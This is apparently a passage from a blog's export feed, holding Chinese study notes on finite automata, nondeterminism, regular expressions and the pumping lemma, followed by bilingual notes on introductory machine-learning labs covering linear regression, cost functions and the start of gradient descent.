    ​ 2.$\Sigma={0,1}$

    ​ 3.$\delta$ 描述为:

    状态/信号01
    $q_1$$q_1$$q_2$
    $q_2$$q_3$$q_2$
    $q_3$$q_2$$q_2$

    ​ 4.$q_1$ 是起始状态。

    ​ 5.$F={q_2}$

    1.1.2 有穷自动机举例

    即,$M_1$ 可用形式化描述为 $M_1=({q_1,q_2},{0,1},\delta,q_1,{q_2})$,转移函数 $\delta$ 为:

    状态/信号01
    $q_1$$q_1$$q_2$
    $q_2$$q_3$$q_2$
    $q_3$$q_2$$q_2$

    形式化描述就是一个 5 元组。


    若 $A$ 是机器 $M$ 接受全部字符串集,则称 $A$ 是机器 $M$ 的语言,记作 $L(M)=A$,又称 $M$ 识别 $A$ 或 $M$ 接受 $A$。(把计算模型语言结合到一起,而语言又可以与问题进行编码,因此就通过语言计算模型问题关联起来)

    $L(M_1)={w|w 至少一个 1 并且在最后的 1 后面有偶数个 0}$

    1.1.3 计算的形式化定义

    形式化定义能够清除在非形式化描述中可能出现的任何二义性。

    ​ 设 $M=(Q,\Sigma,\delta,q_0,F)$ 是一台有穷自动机,$w=w_1 w_2 … w_n$ 是一个字符串并且其中任一 $w_i$ 是字母表 $\Sigma$ 的成员。如果存在 $Q$ 中的状态序列 $r_0,r_1,…,r_n$,满足下述条件:(为了解释自动机如何接受这个字符串)

    • $r_0=q_0$(起始状态吻合)
    • $\delta(r_i,w_{i+1})=r_{i+1},i=0,…,n-1$ (转移函数吻合)
    • $r_n\in F$ (接收状态吻合)

    则 $M$ 接受 $w$。

    ​ 如果 $A={w|M 接受 w}$,则称 $M$ 识别语言 $A$。

    ​ 如果一个语言被一台有穷自动机识别,则称它是正则语言(regular language)。

    1.1.4 设计有穷自动机

    例 1:设计有穷自动机 $E_1$,假设字母表是 ${0,1}$,识别的语言由所有含有奇数个 1 的字符串组成。

    png

    例 2:设计有穷自动机 $E_2$,使其能够识别含有 001 作为字串组成的正则语言。

    png

    1.1.5 正则运算

    ​ 如果一个语言被一台有穷自动机识别,则称它是正则语言(regular language)。

    定义:设 $A$ 和 $B$ 是两个语言,定义正则运算连接星号

    ​ 设字母表 $\Sigma$ 是标准的 26 个字母 ${a,b,…,z}$。又设 $A={good,bad}$,$B={boy,girl}$,则:

    $A\cup B={good,bad,boy,girl}$,

    $A\circ B={goodboy,goodgirl,badboy,badgirl}$

    $A^*={\varepsilon(表示空),good, bad,goodgood,goodbad,badgood,badbad,goodgoodgood,…}$

    ​ 如果把某种运算应用于一个对象集合的成员得到的对象仍在这个集合中,则称这个对象集合在该运算下封闭

    正则语言类在并、连接、星号运算下封闭。

    1.2 非确定性

    • 有穷自动机(Finite Automata)FA

    • 确定型有穷自动机(Deterministic Finite Automata)DFA

    • 非确定型有穷自动机(NonDeterministic Finite Automata)NFA

    ​ 证明定理遇到困难,暂时放下——引入不确定性

    • 确定性:机器处于给定状态并读入下一个输入符,可以知道机器的下一个状态是什么——确定的。
    • 不确定性:任何一个点,下一个状态可能存在若干中选择。体现在:
      • 转换规则——一入多出,
      • $\varepsilon$ 是空字(当前状态($q_2$)不稳定,不用读入输入,自动转到下一个状态($q_3$))——无转入态。

    png

    ​ 设 $A$ 是 ${0,1}$ 上倒数第三个符号为 1 的所有字符串组成的语言,下图 NFA $N_2$ 识别 $A$。

    png

    ​ 让其停留在起始状态 $q_1$,直到它“猜想”它正好位于倒数第三的位置上。

    1.2.1 非确定型有穷自动机的形式化定义

    非确定型有穷自动机是一个 5 元组 $(Q,\Sigma,\delta,q_0,F)$,其中

    • $Q$ 是有穷的状态集
    • $\Sigma$ 是有穷的字母表字母表
    • $\delta:Q\times{\color{red}\Sigma_\varepsilon}\to P(Q)$ 是转移函数(仅在转移函数上与 DFA 不同)。
    • $q_0\in Q$ 是起始状态
    • $F\subseteq Q$ 是接收状态集

    png

    $N_1$ 的形式化描述是 $(Q,\Sigma,\delta,q_1,F)$,其中

    1. $Q={q_1,q_2,q_3,q_4}$;
    2. $\Sigma ={0,1}$;
    3. $\delta$ 由下表给出:
    01$\varepsilon$
    $q_1$${q_1}$${q_1,q_2}$$\varnothing$
    $q_2$${q_3}$$\varnothing$${q_3}$
    $q_3$$\varnothing$${q_4}$$\varnothing$
    $q_4$${q_4}$${q_4}$$\varnothing$
    1. $q_1$ 是起始状态;
    2. $F={q_4}$

    1.2.2 NFA 与 DFA 的等价性

    NFA $\Leftrightarrow $ DFA

    每一台非确定型有穷自动机都等价(识别同样的语言)于某一台确定型有穷自动机。

    一个语言是正则的,当且仅当有一台非确定型有穷自动机识别它。

    png

    为了消除 $\varepsilon$,额外构造状态:

    png

    删除不必要的状态:

    png

    • DFA 机器易算,NFA 人为制造,通常,人造 NFA,让机器把它变成 DFA。
    • 当用并行技术去实现时实际上使用 NFA。
    • 当对有指数个结点的树回溯和搜索(可能这里广度优先比深度优先好),是用 DFA。
    • 对应于 NFA 这样的简单并行程序中可以串行化。

    1.2.3 在正则运算下的封闭性

    正则语言类在并、连接、星号运算下封闭。

    1.3 正则表达式

    可以用正则运算符构造描述语言的表达式,称为正则表达式

    1.3.1 正则表达式的形式化定义

    Python 正则表达式 | 菜鸟教程 (runoob.com)

    称 $R$ 是一个正则表达式,如果 $R$ 是:

    1. $a$,这里 $a$ 是字母表 $\Sigma$ 中的一个元素;
    2. $\varepsilon$;(表示只包含一个字符串——空串的语言,而 $\varnothing$ 表示不包含任何字符串的语言)
    3. $\varnothing$;

    (归纳定义)

    1. $R_1\cup R_2$,这里 $R_1$ 和 $R_2$ 是正则表达式;
    2. $(R_1\circ R_2)$,这里 $R_1$ 和 $R_2$ 是正则表达式;
    3. $(R_1^*)$,这里 $R_1$ 是正则表达式。

    1.3.2 与用穷自动机的等价性

    png

    png

    广义非确定型有穷自动机:GNFA

    • 起始状态有射到其他每一个状态的箭头,但是没有从任何其他状态射入的箭头。(避免死循环)
    • 有唯一的一个接收状态,并且它有从其他每一个状态射入的箭头,但是没有射到任何其他状态的箭头。此外,这个接收状态与起始状态不同。
    • 除起始状态和接收状态外,每一个状态到自身和其他每一个状态都有一个箭头。

    1.4 非正则语言

    任何不能被正则表达式所定义的语言都是非正则语言(Nonregular languges)(无穷个可能)

    关于正则语言的泵引理

    泵引理是形式语言与自动机理论中判定一个语言不是正则语言的重要工具,下面介绍的是其通用的形式,除此之外还有其推广的强泵引理等。

    语言中的所有字符串只要它的长度不小于某个特定值——泵长度,就可以被抽取。

    ——每一个这样的字符串都包括一段字串,把这段字串重复任意次,得到的字符串仍在这个语言中。

    泵引理:若 $A$ 是一个正则语言,则存在一个数 $p$(泵长度)使得,如果 $s$ 是 $A$ 中任一长度不小于 $p$ 的字符串,那么 $s$ 可以被分成 3 段,$s=xyz$,满足下述条件:(随便否定一个,就可以证明不是正则的)

    1. 对每一个 $i\ge 0, xy^iz\in A$($y^i$ 是 $i$ 个 $y$ 连接在一起,$y^0$ 等于 $\varepsilon$)
    2. $|y|>0$(字符串 $y$ 的长度大于 0,换言之,$y\ne \varepsilon$)
    3. $|xy|\le p$($x$ 和 $y$ 两端在一起的长度不超过 $p$)

    我们总能够在离 $s$ 的开始处不太远的地方找到一个非空的串 $y$,然后可以把它看作一个“泵”,重复 $y$ 任意多次,或者去掉它,而所得到的结果串仍然属于 $A$。

    ]]>
    @@ -9649,7 +9649,7 @@ /posts/ML-%E5%90%B4%E6%81%A9%E8%BE%BE%E6%9C%BA%E5%99%A8%E5%AD%A6%E4%B9%A0-week1/ - 资源

    Week1

    Optional Lab: Brief Introduction to Python and Jupyter Notebooks

    可选实验:对 Python 与 Jupyter Notebooks 作简短的介绍。

    Welcome to the first optional lab!

    欢迎来到第一次可选实验!

    Optional labs are available to:

    可选实验的用处:

    • provide information - like this notebook

      • 提供信息——像这个笔记本
    • reinforce lecture material with hands-on examples

      • 对上手实例提供更好的课程工具
    • provide working examples of routines used in the graded labs

      • 提供作业实例用于各个实验

    Goals

    目标

    In this lab, you will:

    在这次实验中,你将:

    • Get a brief introduction to Jupyter notebooks

      • 获得对 Jupyter notebooks 的简短介绍
    • Take a tour of Jupyter notebooks

      • 体验一次 Jupyter notebooks
    • Learn the difference between markdown cells and code cells

      • 了解到 markdown cells 与 code cells 的区别
    • Practice some basic python

      • 练习一些基础 Python 知识

    The easiest way to become familiar with Jupyter notebooks is to take the tour available above in the Help menu:

    熟悉 Jupyter notebooks 最简单的方法就是点击 Help 菜单栏中的 User Interface Tour(用户导览)选项

    png

    Jupyter notebooks have two types of cells that are used in this course. Cells such as this which contain documentation called Markdown Cells. The name is derived from the simple formatting language used in the cells. You will not be required to produce markdown cells. Its useful to understand the cell pulldown shown in graphic below. Occasionally, a cell will end up in the wrong mode and you may need to restore it to the right state:

    在这个资源中,使用到了 Jupyter notebooks 的两种类型的片段。包含文档信息的片段被称之为 Markdown Cells。这个片段命名来自于其使用的简洁格式语言。你并不被要求创建 markdown cells。但这对你理解下面的cell pulldown 很有帮助。有时,单元格会以错误的模式结束,您可能需要将其恢复到正确的状态:

    png

    The other type of cell is the code cell where you will write your code:

    另一种类型的片段被称之为 code cell,你可以在这里撰写你的代码:

    #This is  a 'Code' Cell
    print("This is code cell")
    This is  code cell

    Python

    You can write your code in the code cells.

    你可以在 code cells 中撰写你的代码,

    To run the code, select the cell and either

    要想运行代码,选择这个片段并:

    • hold the shift-key down and hit ‘enter’ or ‘return’
      • 按下 Shift+Enter(或 Return)键
    • click the ‘run’ arrow above
      • 点击 run 按钮

    png

    输出结果

    Print statements will generally use the python f-string style.

    输出结果默认使用 python 的 f-string 风格

    Try creating your own print in the following cell.

    尝试在下面这个片段创建你自己的输出。

    Try both methods of running the cell.

    尝试两种方法运行这个片段。

    # print statements
    variable = "right in the strings!"
    print(f"f strings allow you to embed variables {variable}")
    f strings allow you to embed variables right in the strings!

    Congratulations!

    恭喜!

    You now know how to find your way around a Jupyter Notebook.

    你知道了怎么使用 Jupyter Notebook。


    Optional Lab: Model Representation

    png

    Goals

    In this lab you will:
    在这次实验中你将:

    • Learn to implement the model $f_{w,b}$ for linear regression with one variable
      学习实现单变量线性回归

    Notation

    Here is a summary of some of the notation you will encounter.
    以下是您将遇到的一些符号的摘要.

    General Notation
    一般表示法
    Description
    描述
    Python
    (if applicable 如果适用)
    $a$scalar, non bold 标量,非粗体
    $\mathbf{a}$vector, bold 向量,粗体
    Regression 回归
    $\mathbf{x}$Training Example feature values (in this lab - Size (1000sqft)) 训练示例特征值(在本练习中 - 大小(1000 平方英尺))x_train
    $\mathbf{y}$Training Example targets (in this lab Price (1000s of dollars)). 训练示例目标(在本练习中为价格(1000 美元))。y_train
    $x^{(i)}$, $y^{(i)}$$i_{th}$Training Example 训练示例x_i, y_i
    mNumber of training examples 训练示例数量m
    $w$parameter: weight, 参数:斜率w
    $b$parameter: bias 参数:截距b
    $f_{w,b}(x^{(i)})$The result of the model evaluation at $x^{(i)}$ parameterized by $w,b$: $f_{w,b}(x^{(i)}) = wx^{(i)}+b$f_wb

    Tools

    In this lab you will make use of:

    • NumPy, a popular library for scientific computing
    • Matplotlib, a popular library for plotting data
    import numpy as np
    import matplotlib.pyplot as plt
    plt.style.use('./deeplearning.mplstyle')

    Problem Statement

    png

    As in the lecture, you will use the motivating example of housing price prediction.
    This lab will use a simple data set with only two data points - a house with 1000square feet(sqft) sold for $300,000 and a house with 2000square feet sold for $500,000. These two points will constitute our data or training set. In this lab, the units of size are 1000sqft and the units of price are 1000s of dollars.

    与课堂一样,您将使用房价预测的激励性示例。
    本实验将使用一个只有两个数据点的简单数据集 - 一个以$300,000 出售的 1000 平方英尺的房子和一个以$500,000 出售的 2000 平方英尺的房子。这两点将构成我们的数据或训练集。在这个实验室中,大小单位是 1000 平方英尺,价格单位是 1000 美元。

    Size (1000sqft)Price (1000s of dollars)
    1.0300
    2.0500

    You would like to fit a linear regression model (shown above as the blue straight line) through these two points, so you can then predict price for other houses - say, a house with 1200sqft.

    您希望通过这两个点拟合线性回归模型(如上图所示为蓝色直线),以便您可以预测其他房屋的价格 - 例如,1200 平方英尺的房屋。

    Please run the following code cell to create your x_train and y_train variables. The data is stored in one-dimensional NumPy arrays.

    请运行以下代码单元以创建“x_train”和“y_train”变量。数据存储在一维 NumPy 数组中。

    # x_train is the input variable (size in 1000square feet)
    # y_train is the target (price in 1000s of dollars)
    x_train = np.array([1.0, 2.0])
    y_train = np.array([300.0, 500.0])
    print(f"x_train = {x_train}")
    print(f"y_train = {y_train}")
    x_train = [1. 2.]y_train = [300. 500.]

    Note: The course will frequently utilize the python ‘f-string’ output formatting described here when printing. The content between the curly braces is evaluated when producing the output.

    注意:本课程在打印时将经常使用此处描述的 python“f-string”输出格式。生成输出时,将计算大括号之间的内容。

    Number of training examples m

    You will use m to denote the number of training examples. Numpy arrays have a .shape parameter. x_train.shape returns a python tuple with an entry for each dimension. x_train.shape[0] is the length of the array and number of examples as shown below.

    您将使用 m 表示训练示例的数量。枚举数组具有 a.shape 参数。x_train.shape 返回一个 python 元组,其中包含每个维度的条目。x_train.shape[0] 是数组的长度和示例的数量,如下所示。

    # m is the number of training examples
    print(f"x_train.shape: {x_train.shape}")
    m = x_train.shape[0]
    print(f"Number of training examples is: {m}")
    x_train.shape: (2,)Number of training examples is: 2

    One can also use the Python len() function as shown below.

    也可以使用 Python len()函数,如下所示。

    # m is the number of training examples
    m = len(x_train)
    print(f"Number of training examples is: {m}")
    Number of training examples is: 2

    Training example x_i, y_i

    You will use (x$^{(i)}$, y$^{(i)}$) to denote the $i^{th}$ training example. Since Python is zero indexed, (x$^{(0)}$, y$^{(0)}$) is (1.0, 300.0) and (x$^{(1)}$, y$^{(1)}$) is (2.0, 500.0).

    To access a value in a Numpy array, one indexes the array with the desired offset. For example the syntax to access location zero of x_train is x_train[0].
    Run the next code block below to get the $i^{th}$ training example.

    您将使用 (x$^{(i)}$, y$^{(i)}$) 来表示第 i 个训练示例。由于 Python 的索引为零,因此 (x$^{(0)}$, y$^{(0)}$) 是 (1.0, 300.0) 和 (x$^{(1)}$, y$^{(1)}$) 是 (2.0, 500.0)。

    要访问 Numpy 数组中的值,请使用所需的偏移量对数组编制索引。例如,访问x_train的位置零的语法是x_train[0]。运行下面的下一个代码块以获取第 i 个训练示例。

    i = 0 # Change this to 1 to see (x^1, y^1)

    x_i = x_train[i]
    y_i = y_train[i]
    print(f"(x^({i}), y^({i})) = ({x_i}, {y_i})")
    (x^(0), y^(0)) = (1.0, 300.0)
    i = 1

    x_i = x_train[i]
    y_i = y_train[i]
    print(f"(x^({i}), y^({i})) = ({x_i}, {y_i})")
    (x^(1), y^(1)) = (2.0, 500.0)

    Plotting the data 绘制数据

    You can plot these two points using the scatter() function in the matplotlib library, as shown in the cell below.

    • The function arguments marker and c show the points as red crosses (the default is blue dots).

    You can use other functions in the matplotlib library to set the title and labels to display

    您可以使用 matplotlib 库中的 scatter() 函数绘制这两个点,如下面的单元格所示。

    • 函数参数 markc 将点显示为红十字(默认值为蓝点)。

    您可以使用 matplotlib 库中的其他函数来设置要显示的标题和标签

    # Plot the data points
    plt.scatter(x_train, y_train, marker='x', c='r')
    # Set the title
    plt.title("Housing Prices")
    # Set the y-axis label
    plt.ylabel('Price (in 1000s of dollars)')
    # Set the x-axis label
    plt.xlabel('Size (1000sqft)')
    plt.show()

    png

    Model function 模型函数

    png

    As described in lecture, the model function for linear regression (which is a function that maps from x to y) is represented as

    如讲座中所述,线性回归的模型函数(从 x 映射到 y 的函数)表示为

    $$ f_{w,b}(x^{(i)}) = wx^{(i)} + b \tag{1}$$

    The formula above is how you can represent straight lines - different values of $w$ and $b$ give you different straight lines on the plot.

    上面的公式决定如何表示直线 - 不同的 $w$ 和 $b$ 值在图上显示不同的直线。

    Let’s try to get a better intuition for this through the code blocks below. Let’s start with $w = 100$ and $b = 100$.

    让我们尝试通过下面的代码块获得更好的直觉。让我们从 w=100 和 b=100 开始。

    Note: You can come back to this cell to adjust the model’s w and b parameters

    注意:您可以返回此单元格以调整模型的 w 和 b 参数

    w = 100
    b = 100
    print(f"w: {w}")
    print(f"b: {b}")
    w: 100b: 100

    Now, let’s compute the value of $f_{w,b}(x^{(i)})$ for your two data points. You can explicitly write this out for each data point as -

    现在,让我们计算两个数据点的 $f_{w,b}(x^{(i)})$ 值。您可以为每个数据点显式地将其写出为 -

    for $x^{(0)}$, f_wb = w * x[0] + b

    for $x^{(1)}$, f_wb = w * x[1] + b

    For a large number of data points, this can get unwieldy and repetitive. So instead, you can calculate the function output in a for loop as shown in the compute_model_output function below.

    对于大量数据点,这可能会变得笨拙和重复。因此,您可以计算 for 循环中的函数输出,如下面的 compute_model_output 函数所示。

    Note: The argument description (ndarray (m,)) describes a Numpy n-dimensional array of shape (m,). (scalar) describes an argument without dimensions, just a magnitude.

    注意:参数描述 (ndarray (m,)) 描述了形状 (m,) 的 Numpy n 维数组。(scalar)描述一个没有维度的参数,只是一个量级。

    Note: np.zero(n) will return a one-dimensional numpy array with $n$ entries

    注意np.zero(n) 将返回一个包含 $n$ 个条目的一维 numpy 数组

    def compute_model_output(x, w, b):
    """
    Computes the prediction of a linear model
    计算线性模型的预测
    Args:
    x (ndarray (m,)): Data, m examples
    w,b (scalar) : model parameters
    Returns
    y (ndarray (m,)): target values
    """
    m = x.shape[0]
    f_wb = np.zeros(m)
    for i in range(m):
    f_wb[i] = w * x[i] + b

    return f_wb

    Now let’s call the compute_model_output function and plot the output.

    现在,让我们调用 compute_model_output 函数并绘制输出。

    tmp_f_wb = compute_model_output(x_train, w, b,)

    # Plot our model prediction
    plt.plot(x_train, tmp_f_wb, c='b',label='Our Prediction')

    # Plot the data points
    plt.scatter(x_train, y_train, marker='x', c='r',label='Actual Values')

    # Set the title
    plt.title("Housing Prices")
    # Set the y-axis label
    plt.ylabel('Price (in 1000s of dollars)')
    # Set the x-axis label
    plt.xlabel('Size (1000sqft)')
    plt.legend()
    plt.show()

    png

    As you can see, setting $w = 100$ and $b = 100$ does not result in a line that fits our data.

    如您所见,设置 $w = 100$ 和 $b = 100$ 不会生成适合我们数据的线。

    Challenge 挑战

    Try experimenting with different values of $w$ and $b$. What should the values be for a line that fits our data?

    尝试使用 $w$ 和 $b$ 的不同值。适合我们数据的线的值应该是多少?

    Tip:

    You can use your mouse to click on the triangle to the left of the green “Hints” below to reveal some hints for choosing b and w.

    您可以使用鼠标单击下面绿色“提示”左侧的三角形,以显示选择 b 和 w 的一些提示。

    Hints

    • Try $w = 200$ and $b = 100$

    Prediction

    Now that we have a model, we can use it to make our original prediction. Let’s predict the price of a house with 1200sqft. Since the units of $x$ are in 1000’s of sqft, $x$ is 1.2.

    现在我们有了一个模型,我们可以用它来做出我们的原始预测。让我们预测 1200 平方英尺的房子的价格。由于 $x$ 的单位是 1000 的平方英尺,因此 $x$ 是 1.2。

    w = 200                         
    b = 100
    x_i = 1.2
    cost_1200sqft = w * x_i + b

    print(f"${cost_1200sqft:.0f} thousand dollars")
    $340 thousand dollars

    Congratulations!

    In this lab you have learned:

    • Linear regression builds a model which establishes a relationship between features and targets
      • In the example above, the feature was house size and the target was house price
      • for simple linear regression, the model has two parameters $w$ and $b$ whose values are ‘fit’ using training data.
      • once a model’s parameters have been determined, the model can be used to make predictions on novel data.

    在本实验中,您了解了:

    • 线性回归构建一个模型,该模型在特征和目标之间建立关系
      • 在上面的示例中,特征是房屋大小,目标是房价
      • 对于简单的线性回归,模型有两个参数$w$和$b$,其值使用训练数据“拟合”。
      • 一旦确定了模型的参数,该模型就可用于对新数据进行预测。

    Optional Lab: Cost Function

    png

    Goals

    In this lab you will:

    • you will implement and explore the cost function for linear regression with one variable.

    在本次实验中,您将:

    • 您将实现并探索具有一个变量的线性回归的成本函数。

    Tools

    In this lab we will make use of:

    • NumPy, a popular library for scientific computing
    • Matplotlib, a popular library for plotting data
    • local plotting routines in the lab_utils_uni.py file in the local directory

    在本实验中,我们将利用:

    • NumPy,一个流行的科学计算库
    • Matplotlib,用于绘制数据的流行库
    • 本地目录中 lab_utils_uni.py 文件中的本地绘图例程
    import numpy as np
    %matplotlib widget
    import matplotlib.pyplot as plt
    from lab_utils_uni import plt_intuition, plt_stationary, plt_update_onclick, soup_bowl
    plt.style.use('./deeplearning.mplstyle')

    Problem Statement

    You would like a model which can predict housing prices given the size of the house.
    Let’s use the same two data points as before the previous lab- a house with 1000square feet sold for $300,000 and a house with 2000square feet sold for $500,000.

    您需要一个模型,该模型可以根据房屋的大小预测房价。
    让我们使用与上一个实验室之前相同的两个数据点 - 一个以$300,000 出售的 1000 平方英尺的房子和以$500,000 出售的 2000 平方英尺的房屋。

    Size (1000sqft)Price (1000s of dollars)
    1300
    2500
    x_train = np.array([1.0, 2.0])           #(size in 1000square feet)
    y_train = np.array([300.0, 500.0]) #(price in 1000s of dollars)

    Computing Cost

    The term ‘cost’ in this assignment might be a little confusing since the data is housing cost. Here, cost is a measure how well our model is predicting the target price of the house. The term ‘price’ is used for housing data.

    此分配中的术语“成本”可能有点令人困惑,因为数据是住房成本。在这里,成本是衡量我们的模型预测房屋目标价格的能力。术语“价格”用于住房数据。

    The equation for cost with one variable is:
    $$J(w,b) = \frac{1}{2m} \sum\limits_{i = 0}^{m-1} (f_{w,b}(x^{(i)}) - y{(i)})2 \tag{1}$$

    where
    $$f_{w,b}(x^{(i)}) = wx^{(i)} + b \tag{2}$$

    • $f_{w,b}(x^{(i)})$ is our prediction for example $i$ using parameters $w,b$.
      • $f_{w,b}(x^{(i)})$ 是我们的预测,例如使用参数 $w,b$ $i$。
    • $(f_{w,b}(x^{(i)}) -y{(i)})2$ is the squared difference between the target value and the prediction.
      • $(f_{w,b}(x^{(i)}) -y{(i)})2$ 是目标值和预测值之间的平方差
    • These differences are summed over all the $m$ examples and divided by 2m to produce the cost, $J(w,b)$.
      • 这些差异在所有$m$示例中相加,然后除以2m以产生成本, $J(w,b)$.

    Note, in lecture summation ranges are typically from 1 to m, while code will be from 0 to m-1.
    请注意,在课程中,求和范围通常为 1 到 m,而代码的范围是从 0 到 m-1。

    The code below calculates cost by looping over each example. In each loop:

    • f_wb, a prediction is calculated
    • the difference between the target and the prediction is calculated and squared.
    • this is added to the total cost.

    下面的代码通过循环遍历每个示例来计算成本。在每个循环中:

    • f_wb,计算预测
    • 计算目标和预测之间的差值并平方。
    • 这被添加到总成本中。
    def compute_cost(x, y, w, b): 
    """
    Computes the cost function for linear regression.
    计算线性回归的成本函数。

    Args:
    x (ndarray (m,)): Data, m examples
    y (ndarray (m,)): target values
    w,b (scalar) : model parameters

    Returns
    total_cost (float): The cost of using w,b as the parameters for linear regression
    to fit the data points in x and y
    total_cost(float):使用 w,b 作为线性回归参数的成本
    以拟合 x 和 y 中的数据点
    """
    # number of training examples
    m = x.shape[0]

    cost_sum = 0
    for i in range(m):
    f_wb = w * x[i] + b
    cost = (f_wb - y[i]) ** 2
    cost_sum = cost_sum + cost
    total_cost = (1 / (2 * m)) * cost_sum

    return total_cost

    Cost Function Intuition

    png
    Your goal is to find a model $f_{w,b}(x) = wx + b$, with parameters $w,b$, which will accurately predict house values given an input $x$. The cost is a measure of how accurate the model is on the training data.

    The cost equation (1) above shows that if $w$ and $b$ can be selected such that the predictions $f_{w,b}(x)$ match the target data $y$, the $(f_{w,b}(x^{(i)}) - y{(i)})2 $ term will be zero and the cost minimized. In this simple two point example, you can achieve this!

    In the previous lab, you determined that $b=100$ provided an optimal solution so let’s set $b$ to 100 and focus on $w$.


    Below, use the slider control to select the value of $w$ that minimizes cost. It can take a few seconds for the plot to update.

    您的目标是找到一个模型,$f_{w,b}(x) = wx + b$,参数$w,b$,这将在给定输入$x$的情况下准确预测房屋价值。成本是模型在训练数据上的准确程度的度量。

    上面的成本等式(1)表明,如果可以选择 $w$ 和 $b$,使得预测$f_{w,b}(x)$ 与目标数据 $y$ 匹配,则 $(f_{w,b}(x^{(i)}) - y{(i)})2 $ 项将为零,并且成本最小化。在这个简单的两点示例中,您可以实现此目的!

    在之前的实验中,您确定$b=100$ 提供了最佳解决方案,因此让我们将 $b$ 设置为 100,并专注于 $w$。


    下面,使用滑块控件选择$w$ 的值,以最大限度地降低成本。可能需要几秒钟才能更新绘图。

    啥也出不来 orz

    plt_intuition(x_train,y_train)
    interactive(children=(IntSlider(value=150, description='w', max=400, step=10), Output()), _dom_classes=('widge…

    The plot contains a few points that are worth mentioning.

    • cost is minimized when $w = 200$, which matches results from the previous lab
    • Because the difference between the target and pediction is squared in the cost equation, the cost increases rapidly when $w$ is either too large or too small.
    • Using the w and b selected by minimizing cost results in a line which is a perfect fit to the data.

    该图包含了几个值得一提的要点。

    • 当 $w = 200$ 时,成本最小化,这与上一个实验室的结果相匹配
    • 由于目标和国家之间的差异在成本等式中是平方的,因此当 $w$ 美元太大或太小时,成本会迅速增加。
    • 使用通过最小化成本选择的wb,可以生成一条与数据完美匹配的线。

    Cost Function Visualization- 3D

    You can see how cost varies with respect to both w and b by plotting in 3D or using a contour plot.
    It is worth noting that some of the plotting in this course can become quite involved. The plotting routines are provided and while it can be instructive to read through the code to become familiar with the methods, it is not needed to complete the course successfully. The routines are in lab_utils_uni.py in the local directory.

    您可以通过以 3D 方式绘制或使用等高线图来了解成本相对于 两者 wb 的变化。
    值得注意的是,本课程中的一些情节可能会变得非常复杂。提供了绘图例程,虽然通读代码以熟悉方法可能很有启发性,但成功完成课程并不需要。这些例程位于本地目录的 lab_utils_uni.py 中。

    Larger Data Set

    It’s use instructive to view a scenario with a few more data points. This data set includes data points that do not fall on the same line. What does that mean for the cost equation? Can we find $w$, and $b$ that will give us a cost of 0?

    使用具有更多数据点来查看方案具有指导意义。此数据集包括不在同一行上的数据点。这对成本等式意味着什么?我们能找到$w$,$b$,这将使我们的成本为 0 吗?

    x_train = np.array([1.0, 1.7, 2.0, 2.5, 3.0, 3.2])
    y_train = np.array([250, 300, 480, 430, 630, 730,])

    In the contour plot, click on a point to select w and b to achieve the lowest cost. Use the contours to guide your selections. Note, it can take a few seconds to update the graph.

    在等值线图中,单击一个点以选择wb以实现最低成本。使用等值线来指导您的选择。请注意,更新图表可能需要几秒钟。

    plt.close('all') 
    fig, ax, dyn_items = plt_stationary(x_train, y_train)
    updater = plt_update_onclick(fig, ax, x_train, y_train, dyn_items)

    png

    Above, note the dashed lines in the left plot. These represent the portion of the cost contributed by each example in your training set. In this case, values of approximately $w=209$ and $b=2.4$ provide low cost. Note that, because our training examples are not on a line, the minimum cost is not zero.

    在上面,请注意左侧图中的虚线。这些表示训练集中每个示例所贡献的成本部分。在这种情况下,大约$w=209$和$b=2.4$提供了低成本。请注意,由于我们的训练示例不在一条线上,因此最低成本不为零。

    Convex Cost surface

    The fact that the cost function squares the loss ensures that the ‘error surface’ is convex like a soup bowl. It will always have a minimum that can be reached by following the gradient in all dimensions. In the previous plot, because the $w$ and $b$ dimensions scale differently, this is not easy to recognize. The following plot, where $w$ and $b$ are symmetric, was shown in lecture:

    成本函数对损失进行平方的事实确保了“误差表面”像汤碗一样凸起。它将始终具有可以通过遵循所有维度的梯度来达到的最小值。在前面的图中,由于$w$和$b$的尺寸比例不同,所以不容易识别。以下图,其中$w$和$b$是对称的,在课程中显示:

    soup_bowl()

    png

    Congratulations!

    You have learned the following:

    • The cost equation provides a measure of how well your predictions match your training data.
    • Minimizing the cost can provide optimal values of $w$, $b$.

    您已经了解了以下内容:

    • 成本等式用于衡量您的预测与训练数据匹配的程度。
    • 最小化成本可以提供$w$,$b$的最佳值。

    Optional Lab: Gradient Descent for Linear Regression

    png

    Goals

    In this lab, you will:

    • automate the process of optimizing $w$ and $b$ using gradient descent.
    • 使用梯度下降自动执行优化 $w$ 和 $b$ 的过程。

    Tools

    In this lab, we will make use of:

    • NumPy, a popular library for scientific computing
    • Matplotlib, a popular library for plotting data
    • plotting routines in the lab_utils.py file in the local directory
    import math, copy
    import numpy as np
    import matplotlib.pyplot as plt
    plt.style.use('./deeplearning.mplstyle')
    from lab_utils_uni import plt_house_x, plt_contour_wgrad, plt_divergence, plt_gradients
    !ls -al
    'ls' 不是内部或外部命令,也不是可运行的程序或批处理文件。

    Problem Statement

    Let’s use the same two data points as before - a house with 1000square feet sold for $300,000 and a house with 2000square feet sold for $500,000.

    Size (1000sqft)Price (1000s of dollars)
    1300
    2500
    # Load our data set
    x_train = np.array([1.0, 2.0]) #features
    y_train = np.array([300.0, 500.0]) #target value

    Compute_Cost

    This was developed in the last lab. We’ll need it again here.

    这是在上一个实验中撰写的。我们在这里再次需要它。

    #Function to calculate the cost
    def compute_cost(x, y, w, b):

    m = x.shape[0]
    cost = 0

    for i in range(m):
    f_wb = w * x[i] + b
    cost = cost + (f_wb - y[i])**2
    total_cost = 1 / (2 * m) * cost

    return total_cost

    Gradient descent summary

    So far in this course, you have developed a linear model that predicts $f_{w,b}(x^{(i)})$:

    到目前为止,在本课程中,您已经开发了一个线性模型来预测 $f_{w,b}(x^{(i)})$:

    $$f_{w,b}(x^{(i)}) = wx^{(i)} + b \tag{1}$$
    In linear regression, you utilize input training data to fit the parameters $w$,$b$ by minimizing a measure of the error between our predictions $f_{w,b}(x^{(i)})$ and the actual data $y^{(i)}$. The measure is called the $cost$, $J(w,b)$. In training you measure the cost over all of our training samples $x{(i)},y{(i)}$

    在线性回归中,您利用输入训练数据来拟合参数 $w$, $b$,$b$ 通过最小化我们的预测 $f_{w,b}(x^{(i)})$ 与实际数据 $y^{(i)}$ 之间的误差度量。该度量称为 $cost$ , $J(w,b)$。在训练中,您可以测量我们所有训练样本 $x{(i)},y{(i)}$ 的 $cost$

    $$J(w,b) = \frac{1}{2m} \sum\limits_{i = 0}^{m-1} (f_{w,b}(x^{(i)}) - y{(i)})2\tag{2}$$

    In lecture, gradient descent was described as:

    在课程中,梯度下降被描述为:

